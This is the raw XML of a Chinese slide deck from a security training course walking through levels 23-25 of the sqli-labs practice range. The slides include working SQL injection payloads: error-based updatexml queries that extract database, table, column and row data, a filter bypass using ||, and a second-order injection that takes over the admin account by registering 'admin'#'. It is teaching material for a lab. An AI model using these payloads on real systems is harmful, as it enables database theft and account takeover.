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457" r:id="rId3"/>
    <p:sldId id="1394" r:id="rId4"/>
    <p:sldId id="1486" r:id="rId6"/>
    <p:sldId id="1487" r:id="rId7"/>
    <p:sldId id="1488" r:id="rId8"/>
    <p:sldId id="1490" r:id="rId9"/>
    <p:sldId id="1491" r:id="rId10"/>
    <p:sldId id="1492" r:id="rId11"/>
  </p:sldIdLst>
  <p:sldSz cx="12192635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z" initials="x" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="秦 莫天" initials="秦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FEFEF"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="003366"/>
    <a:srgbClr val="3399FF"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="FFCC00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6026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1368" y="78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2014"/>
        <p:guide pos="3687"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="32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885" y="720725"/>
            <a:ext cx="640143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A1ED033-5F5C-4572-AE4B-7CFF71C657D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 descr="掌控者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3835" y="1240790"/>
            <a:ext cx="1740535" cy="621665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12193201" cy="3068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" name="AutoShape 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3759570" y="3113088"/>
            <a:ext cx="7823970" cy="8382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gray">
          <a:xfrm>
            <a:off x="10262610" y="1741488"/>
            <a:ext cx="71127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" name="Rectangle 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9246510" y="1131888"/>
            <a:ext cx="121932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gray">
          <a:xfrm>
            <a:off x="10770660" y="141288"/>
            <a:ext cx="121932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Rectangle 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="7508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gray">
          <a:xfrm>
            <a:off x="8433630" y="28844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gray">
          <a:xfrm>
            <a:off x="508050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gray">
          <a:xfrm>
            <a:off x="569016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Rectangle 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="599499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Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="629982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5" name="Group 211"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299820" y="1741488"/>
            <a:ext cx="1727370" cy="838200"/>
            <a:chOff x="2976" y="1440"/>
            <a:chExt cx="816" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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7" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="297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8" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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9" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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0" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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1" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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2" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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4" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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5" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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7" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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8" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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gray">
            <a:xfrm>
              <a:off x="3696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0" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="369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gray">
            <a:xfrm>
              <a:off x="3696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212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4470840" y="1970088"/>
            <a:ext cx="1727370" cy="609600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="816" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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4" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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5" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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6" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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7" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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8" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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9" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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0" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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1" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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2" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="283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gray">
            <a:xfrm>
              <a:off x="2256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gray">
            <a:xfrm>
              <a:off x="211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Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016100" y="3570288"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 144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7" name="Rectangle 145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8" name="Rectangle 146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9" name="Rectangle 147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0" name="Rectangle 148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1" name="Rectangle 149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2" name="Rectangle 150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3" name="Rectangle 151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5" name="Rectangle 153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6" name="Rectangle 154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7" name="Rectangle 155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8" name="Rectangle 156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9" name="Rectangle 157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1" name="Rectangle 159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2" name="Rectangle 160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3" name="Rectangle 161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4" name="Rectangle 162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5" name="Rectangle 163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6" name="Rectangle 164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7" name="Rectangle 165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8" name="Rectangle 166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9" name="Rectangle 167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0" name="Rectangle 168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1" name="Rectangle 169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2" name="Rectangle 170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3" name="Rectangle 171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4" name="Rectangle 172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5" name="Rectangle 173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6" name="Rectangle 174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77" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315920" y="827088"/>
            <a:ext cx="3556350" cy="1066800"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rectangle 176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9" name="Rectangle 177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0" name="Rectangle 178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1" name="Rectangle 179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2" name="Rectangle 180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3" name="Rectangle 181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4" name="Rectangle 182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5" name="Rectangle 183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6" name="Rectangle 184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7" name="Rectangle 185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8" name="Rectangle 186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9" name="Rectangle 187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0" name="Rectangle 188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1" name="Rectangle 189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2" name="Rectangle 190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3" name="Rectangle 191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4" name="Rectangle 192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5" name="Rectangle 193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6" name="Rectangle 194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7" name="Rectangle 195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8" name="Rectangle 196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9" name="Rectangle 197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0" name="Rectangle 198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1" name="Rectangle 199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2" name="Rectangle 200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" name="Rectangle 201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" name="Rectangle 202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" name="Rectangle 203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" name="Rectangle 204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7" name="Rectangle 205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8" name="Rectangle 206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9" name="AutoShape 207"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="711270" y="2655888"/>
            <a:ext cx="10262610" cy="838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0" name="Rectangle 208"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2743470" y="42560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gray">
          <a:xfrm>
            <a:off x="2337030" y="4789488"/>
            <a:ext cx="30483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2" name="Rectangle 210"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2032200" y="4941888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2540" y="2732088"/>
            <a:ext cx="8840070" cy="6858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9570" y="3494088"/>
            <a:ext cx="751914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865" y="1437005"/>
            <a:ext cx="3223895" cy="1263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449" y="355600"/>
            <a:ext cx="8685538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E65E-9137-4309-8D78-B392A1917D52}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN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2"/>
          <a:srcRect r="74718" b="16204"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="163830"/>
            <a:ext cx="669925" cy="871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B4DC4-41B9-4E61-AD6F-4DDEA2B459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3519470" y="-2"/>
            <a:ext cx="8673163" cy="4336356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8672711"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX1" fmla="*/ 8672711 w 8672711"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX2" fmla="*/ 4336356 w 8672711"/>
              <a:gd name="connsiteY2" fmla="*/ 4336356 h 433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711" h="4336356">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8672711" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336356" y="43363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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10681752" y="0"/>
            <a:ext cx="1511449" cy="10445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27" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679636" cy="104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028" name="Group 120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9170303" y="152400"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Rectangle 121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8" name="Rectangle 122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9" name="Rectangle 123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0" name="Rectangle 124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1" name="Rectangle 125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2" name="Rectangle 126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3" name="Rectangle 127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4" name="Rectangle 128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5" name="Rectangle 129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6" name="Rectangle 130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7" name="Rectangle 131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8" name="Rectangle 132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9" name="Rectangle 133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0" name="Rectangle 134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1" name="Rectangle 135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2" name="Rectangle 136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3" name="Rectangle 137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4" name="Rectangle 138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5" name="Rectangle 139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6" name="Rectangle 140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7" name="Rectangle 141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8" name="Rectangle 142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9" name="Rectangle 143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0" name="Rectangle 144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1" name="Rectangle 145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2" name="Rectangle 146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3" name="Rectangle 147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4" name="Rectangle 148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5" name="Rectangle 149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6" name="Rectangle 150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7" name="Rectangle 151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29" name="Rectangle 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="76200"/>
            <a:ext cx="304830" cy="381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0" name="Rectangle 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8941680" y="228600"/>
            <a:ext cx="304830" cy="152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1" name="Rectangle 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9144900" y="304800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11270" y="1295400"/>
            <a:ext cx="10923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550" y="6505575"/>
            <a:ext cx="111771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FB4DC4-41B9-4E61-AD6F-4DDEA2B45915}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/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00864" y="262255"/>
            <a:ext cx="86855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" y="-2"/>
            <a:ext cx="12242310" cy="6933462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4035198" y="5682600"/>
            <a:ext cx="4183920" cy="550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r>
              <a:rPr lang="zh-CN" alt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朝阳</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3000" b="0" strike="noStrike" spc="-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470078" y="4988520"/>
            <a:ext cx="3313440" cy="488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掌控安全学院</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-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4479" y="2564686"/>
            <a:ext cx="8239217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altLang="zh-CN" sz="1800" spc="-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sql-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场原理详解（六）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" spc="-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第二十三</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>关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9376" y="1484784"/>
            <a:ext cx="6948772" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p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0485" y="1590675"/>
            <a:ext cx="87522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进入二十三关发现又回到了我们熟悉的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传参，但是在尝试语句时我们发现后面的注释貌似被过滤掉了，这个时候同样可以试试我们之前讲到的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or 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1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=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1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>去把后面自带的单引号消除，发现成功了，于是后面按照以往步骤往下进行即可</a:t>
            </a:r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805" y="3572510"/>
            <a:ext cx="8757285" cy="17843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第二十三关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35710" y="2060575"/>
            <a:ext cx="97764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判断是否存在注入：' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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=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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 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判断库名： 'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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=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判断表名：'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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=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判断列名：'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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=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判断数据：'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>or 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1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=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1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第二十四关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3176905"/>
            <a:ext cx="5396230" cy="1835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8535" y="1296035"/>
            <a:ext cx="100863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第二十四关，我们一进去就能发现和以往有非常明显的不同，他这里有个登陆以及新用户注册，首先我们可以尝试分析一下他的源码，重点在他修改密码这里，他直接去获取了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的值，并未做任何的过滤，所以我这里就可以尝试往</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的值里写一个特殊的传参，然后再利用他去修改密码，而这种先往数据库里写一个特殊参数，然后再调用这个参数去进行注入也被称之为二次注入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35" y="3140710"/>
            <a:ext cx="4833620" cy="18802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第二十四关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0285" y="1160145"/>
            <a:ext cx="8327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、首先注册一个账号为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>#,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后登录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4520" y="1849120"/>
            <a:ext cx="5121275" cy="18719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44090" y="4004945"/>
            <a:ext cx="858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、发现下面有个可修改密码的地方于是我们直接去修改密码，这里修改的密码实际就是我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>账号的密码，我们可以回过头去分析一下上面所讲的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句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20" y="4977130"/>
            <a:ext cx="4152900" cy="14763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第二十四关</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="V7REJ3I2IQ@TU%D$7@A}3$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8235" y="2708910"/>
            <a:ext cx="6820535" cy="38042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84045" y="1700530"/>
            <a:ext cx="9604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修改好之后直接进行登录，发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>账号以及成功变成了我们刚刚所修改的密码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第二十五关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3730" y="1490345"/>
            <a:ext cx="7901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第二十五关，这里首先看上去，他提示了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，咱们直接去捞代码看一下，发现这里有个正则，把我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传参里的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>过滤掉了，那既然他会过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那我们还是可以去尝试用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&amp;&amp;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4225" y="2533650"/>
            <a:ext cx="3505200" cy="17907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第二十五关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31950" y="1880235"/>
            <a:ext cx="925893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判断库名： ?id=1 '|| updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- qwe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判断表名：'|| updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- qwe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判断列名：'|| updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- qwe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判断数据：'|| updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- qwe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x272TGp_report_light">
  <a:themeElements>
    <a:clrScheme name="sx272TGp_report_light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sx272TGp_report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x272TGp_report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1542</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>55</Paragraphs>
  <Slides>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楷体</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第十五关</vt:lpstr>
      <vt:lpstr>第十五关</vt:lpstr>
      <vt:lpstr>第十六关</vt:lpstr>
      <vt:lpstr>第十七关</vt:lpstr>
      <vt:lpstr>第十七关</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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沈传宁</dc:creator>
  <cp:lastModifiedBy>WPS_1602511213</cp:lastModifiedBy>
  <cp:revision>3098</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-18T09:16:58Z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5EC77F3D4641451695A3550036DF892C</vt:lpwstr>
  </property>
</Properties>
</file>